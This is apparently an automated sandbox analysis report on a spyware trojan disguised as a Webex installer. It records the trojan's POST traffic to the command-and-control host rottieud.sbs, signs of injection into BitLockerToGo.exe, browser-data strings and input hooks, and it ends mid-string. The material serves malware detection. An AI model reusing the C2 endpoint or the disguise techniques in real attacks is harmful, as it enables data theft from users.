Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=9XOYRA8F42FOFMUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20413Host: rottieud.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=OPDDOUELN5HDDDXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1236Host: rottieud.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SYJ2CVSRLDMALM7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 573629Host: rottieud.sbs

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: rottieud.sbs

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: rottieud.sbs

Source: BitLockerToGo.exe, 00000002.00000003.1918064678.0000000004DF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: BitLockerToGo.exe, 00000002.00000003.1918064678.0000000004DF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: BitLockerToGo.exe, 00000002.00000003.1918064678.0000000004DF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: BitLockerToGo.exe, 00000002.00000003.1918064678.0000000004DF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: BitLockerToGo.exe, 00000002.00000003.1918064678.0000000004DF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: BitLockerToGo.exe, 00000002.00000003.1918064678.0000000004DF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: BitLockerToGo.exe, 00000002.00000003.1918064678.0000000004DF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: BitLockerToGo.exe, 00000002.00000003.1918064678.0000000004DF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: BitLockerToGo.exe, 00000002.00000003.1918064678.0000000004DF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: BitLockerToGo.exe, 00000002.00000003.1918064678.0000000004DF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: BitLockerToGo.exe, 00000002.00000003.1918064678.0000000004DF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: BitLockerToGo.exe, 00000002.00000003.1891941766.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1892026100.0000000004DE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: BitLockerToGo.exe, 00000002.00000003.1919623503.0000000004DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: BitLockerToGo.exe, 00000002.00000003.1891941766.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1892026100.0000000004DE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: BitLockerToGo.exe, 00000002.00000003.1891941766.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1892026100.0000000004DE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: BitLockerToGo.exe, 00000002.00000003.1891941766.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1892026100.0000000004DE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: BitLockerToGo.exe, 00000002.00000003.1919623503.0000000004DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: BitLockerToGo.exe, 00000002.00000003.1891941766.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1892026100.0000000004DE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: BitLockerToGo.exe, 00000002.00000003.1891941766.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1892026100.0000000004DE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: BitLockerToGo.exe, 00000002.00000003.1891941766.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1892026100.0000000004DE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: gFCeeWNTvZ.exe	String found in binary or memory: https://github.com/go-sql-driver/mysql/wiki/old_passwordsA
Source: BitLockerToGo.exe, 00000002.00000003.1919623503.0000000004DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: BitLockerToGo.exe, 00000002.00000002.1984876735.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rottieud.sbs/
Source: BitLockerToGo.exe, 00000002.00000002.1985066135.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1934857436.0000000000B21000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1934926435.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1960004462.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1949339957.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1949294335.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1978005640.0000000000B30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rottieud.sbs/&
Source: BitLockerToGo.exe, 00000002.00000002.1985066135.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1934857436.0000000000B21000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1934926435.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1960004462.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1949339957.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1949294335.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1978005640.0000000000B30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rottieud.sbs/-
Source: BitLockerToGo.exe, 00000002.00000002.1985066135.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rottieud.sbs/1
Source: BitLockerToGo.exe, 00000002.00000002.1984876735.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rottieud.sbs/api
Source: BitLockerToGo.exe, 00000002.00000002.1984876735.0000000000AFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rottieud.sbs/apiDUv
Source: BitLockerToGo.exe, 00000002.00000003.1949339957.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1949294335.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rottieud.sbs/apiaHD
Source: BitLockerToGo.exe, 00000002.00000003.1905348168.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rottieud.sbs/apid1
Source: BitLockerToGo.exe, 00000002.00000003.1953761551.0000000000B25000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rottieud.sbs/apies
Source: BitLockerToGo.exe, 00000002.00000003.1905348168.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rottieud.sbs/apili
Source: BitLockerToGo.exe, 00000002.00000003.1953178352.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1953761551.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1949408201.0000000000B25000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rottieud.sbs/apipf
Source: BitLockerToGo.exe, 00000002.00000003.1949339957.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1949294335.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rottieud.sbs/apix
Source: BitLockerToGo.exe, 00000002.00000003.1949339957.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1949294335.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rottieud.sbs/ckz
Source: BitLockerToGo.exe, 00000002.00000003.1905348168.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rottieud.sbs/g
Source: BitLockerToGo.exe, 00000002.00000003.1960004462.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1978005640.0000000000B30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rottieud.sbs/h
Source: BitLockerToGo.exe, 00000002.00000002.1985066135.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rottieud.sbs/z
Source: BitLockerToGo.exe, 00000002.00000002.1985066135.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1960004462.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1978005640.0000000000B30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rottieud.sbs:443/apitPd
Source: BitLockerToGo.exe, 00000002.00000003.1891525862.0000000004E2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: BitLockerToGo.exe, 00000002.00000003.1919119297.0000000004EF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: BitLockerToGo.exe, 00000002.00000003.1919119297.0000000004EF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: BitLockerToGo.exe, 00000002.00000003.1891525862.0000000004E2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: BitLockerToGo.exe, 00000002.00000003.1891525862.0000000004E2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: BitLockerToGo.exe, 00000002.00000003.1891941766.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1892026100.0000000004DE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: BitLockerToGo.exe, 00000002.00000003.1891941766.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1892026100.0000000004DE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: BitLockerToGo.exe, 00000002.00000003.1919119297.0000000004EF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: BitLockerToGo.exe, 00000002.00000003.1919119297.0000000004EF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: BitLockerToGo.exe, 00000002.00000003.1919119297.0000000004EF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: BitLockerToGo.exe, 00000002.00000003.1919119297.0000000004EF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: BitLockerToGo.exe, 00000002.00000003.1919119297.0000000004EF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62520 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62521 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62522 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62524
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62525
Source: unknown	Network traffic detected: HTTP traffic on port 62525 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62524 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62523 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62520
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62521
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62522
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62523

Source: unknown	HTTPS traffic detected: 104.21.73.211:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.73.211:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.73.211:443 -> 192.168.2.4:62520 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.73.211:443 -> 192.168.2.4:62521 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.73.211:443 -> 192.168.2.4:62522 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.73.211:443 -> 192.168.2.4:62523 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.73.211:443 -> 192.168.2.4:62524 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.73.211:443 -> 192.168.2.4:62525 version: TLS 1.2

Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe

Code function: 0_2_646053ED glfwGetClipboardString,OpenClipboard,GetClipboardData,CloseClipboard,CloseClipboard,GlobalLock,CloseClipboard,free,GlobalUnlock,CloseClipboard,

0_2_646053ED

Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe

Code function: 0_2_64605394 glfwSetClipboardString,MultiByteToWideChar,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_64605394

Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe

Code function: 0_2_646053ED glfwGetClipboardString,OpenClipboard,GetClipboardData,CloseClipboard,CloseClipboard,GlobalLock,CloseClipboard,free,GlobalUnlock,CloseClipboard,

0_2_646053ED

Source: gFCeeWNTvZ.exe

Binary or memory string: PFN_DirectInput8Create

Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe

Windows user hook set: 0 mouse low level C:\Windows\SYSTEM32\dinput8.dll

Jump to behavior

Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe

Code function: 0_2_6460BA76 RegisterRawInputDevices,

0_2_6460BA76

Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe

Code function: 0_2_6460B019 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,

0_2_6460B019

Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Code function: 0_3_1276707C	0_3_1276707C
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Code function: 0_3_12762C40	0_3_12762C40
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Code function: 0_3_12762F33	0_3_12762F33
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Code function: 0_3_12764BE8	0_3_12764BE8
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Code function: 0_3_127633D8	0_3_127633D8
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Code function: 0_3_1276A4A5	0_3_1276A4A5
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0052D100	2_2_0052D100
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0053039D	2_2_0053039D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0055C420	2_2_0055C420
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00545423	2_2_00545423
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_005456FF	2_2_005456FF
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_005406E0	2_2_005406E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00545709	2_2_00545709
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00552880	2_2_00552880
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0052D9AE	2_2_0052D9AE
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00552AC0	2_2_00552AC0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0053BAE0	2_2_0053BAE0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0055CCE0	2_2_0055CCE0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00536F52	2_2_00536F52
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00528FD0	2_2_00528FD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00523070	2_2_00523070
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0052A075	2_2_0052A075
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_005450E5	2_2_005450E5
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00556090	2_2_00556090
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00526110	2_2_00526110
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0054A1F0	2_2_0054A1F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_005521E0	2_2_005521E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00559270	2_2_00559270
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00527260	2_2_00527260
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00529200	2_2_00529200
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00542350	2_2_00542350
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00531310	2_2_00531310
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0055A320	2_2_0055A320
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0052B3A0	2_2_0052B3A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_005363A0	2_2_005363A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00545445	2_2_00545445
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00551416	2_2_00551416
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0053E4D0	2_2_0053E4D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0054A490	2_2_0054A490
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0054650E	2_2_0054650E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_005465CF	2_2_005465CF
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0054859D	2_2_0054859D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00538670	2_2_00538670
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0053C6E0	2_2_0053C6E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0054C6E0	2_2_0054C6E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00541699	2_2_00541699
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0054B754	2_2_0054B754
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0055C700	2_2_0055C700
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00526720	2_2_00526720
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00559830	2_2_00559830
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_005568F0	2_2_005568F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_005258EA	2_2_005258EA
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0055C9F0	2_2_0055C9F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0054C9A0	2_2_0054C9A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00523A70	2_2_00523A70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00535A61	2_2_00535A61
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00559A30	2_2_00559A30
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0054BBF4	2_2_0054BBF4
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00522CC0	2_2_00522CC0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0053ACB0	2_2_0053ACB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00546D42	2_2_00546D42
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00549D74	2_2_00549D74
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00527D70	2_2_00527D70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00526DD0	2_2_00526DD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00545DD8	2_2_00545DD8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00559E30	2_2_00559E30
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00529E80	2_2_00529E80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00545423	2_2_00545423
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00551F80	2_2_00551F80

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: String function: 00533950 appears 93 times
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: String function: 00528840 appears 75 times

Source: glfw.3927611081.dll.0.dr

Static PE information: Number of sections : 17 > 10

Source: gFCeeWNTvZ.exe, 00000000.00000000.1676763992.0000000001B60000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameWebex_webex.meet1405.com_e561a3ad-4f21-4bff-900c-12a703623e2d@LrzwSIrPhI_15d8e1d6-9c79-4b49-8fe7-af157539a3fb.exeH& vs gFCeeWNTvZ.exe
Source: gFCeeWNTvZ.exe	Binary or memory string: OriginalFilenameWebex_webex.meet1405.com_e561a3ad-4f21-4bff-900c-12a703623e2d@LrzwSIrPhI_15d8e1d6-9c79-4b49-8fe7-af157539a3fb.exeH& vs gFCeeWNTvZ.exe

Source: gFCeeWNTvZ.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/1@1/1

Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe

Code function: 0_2_64608298 LoadImageW,GetLastError,FormatMessageW,WideCharToMultiByte,

0_2_64608298

Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe

File created: C:\Users\user\AppData\Local\Temp\glfw.3927611081.dll

Jump to behavior

Source: gFCeeWNTvZ.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: gFCeeWNTvZ.exe, 00000000.00000002.1865649432.0000000001210000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: insert into __Index2_Expr values($1, $2)invalid file offset %d (should be <= %d)io.File directory missing ReadDir methodline %d: field %s already set in type %smalformed MIME header: missing colon: %qmarkWorkerStop: unknown mark worker modemax: cannot accept %v (value if type %T)min: cannot accept %v (value if type %T)mismatched scale ratios, got %d, want %dmultipart: unexpected line in Next(): %qmust be able to track idle limiter eventnot required, not desired, not necessarynumber of arguments exceeds maximum! %dopencensus.io/http/client/received_bytesopencensus.io/http/client/response_bytesopencensus.io/http/server/response_bytesoverlap: the params should be array typeoversized record received with length %dpayload ended before LEB128 was finishedpkcs7: payload is not signedData contentports not allowed with file URLs: got %vquotedprintable: invalid hex byte 0x%02xrefill of span with free space remainingreflect.Value.Call: call of nil functionreflect.Value.Call: wrong argument countreflect.Value.SetBytes of non-byte slicereflect.Value.setRunes of non-rune slicereflect: FieldByName of non-struct type reflect: bad layout computation in MapOfreturnsoutputsinputsreceviedbypassUNUSEDrsa: internal error: inconsistent lengthruntime.SetFinalizer: first argument is runtime.preemptM: duplicatehandle failedruntime: SyscallN has too many argumentsruntime: out of memory: cannot allocate runtime: typeBitsBulkBarrier with type ryuFtoaFixed32 called with negative precsum: cannot accept %v (value if type %T)t_version: param base type is not stringtime.Time year outside of range [0,9999]time: Stop called on uninitialized Timertls: received empty certificates messagetoo many invalid names, aborting parsingunsupported flag %q in tag %q of type %suuid: UUID must be exactly 16 bytes longwrong source type for join table handlerwrong type (%s) for received field %s.%sx509: cannot parse IP address of length x509: malformed extension critical fieldxml: trailing '>' in field %s of type %s{{.Field}} must be greater than {{.Min}}%s slice too big: %d elements of %d bytes(?i)^(-?\d+(?:\.\d+)?)\s?([KMGTPE]B?\|B?)$(file-007) corrupted DB: first chunk link(file-011) corrupted 